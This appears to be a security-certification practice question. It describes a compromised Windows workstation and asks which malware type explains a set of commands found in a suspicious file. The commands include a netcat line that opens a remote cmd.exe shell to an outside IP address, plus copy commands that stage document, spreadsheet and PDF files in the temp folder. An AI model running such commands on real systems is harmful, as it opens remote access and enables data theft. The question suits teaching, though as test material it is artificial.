Question No. 1
A security analyst believes an employee’s workstation has been compromised. The analyst reviews the system logs, but does not find any attempted logins. The analyst then runs the diff command, comparing the C:\Windows\System32 directory and the installed cache directory. The analyst finds a series of files that look suspicious.
One of the files contains the following commands:
cmd /C %TEMP%\nc -e cmd.exe 188.8.131.52
copy *.doc > %TEMP%\docfiles.zip
copy *.xls > %TEMP%\xlsfiles.zip
copy *.pdf > %TEMP%\pdffiles.zip
Which of the following types of malware was used?
Choose the correct option from the given list.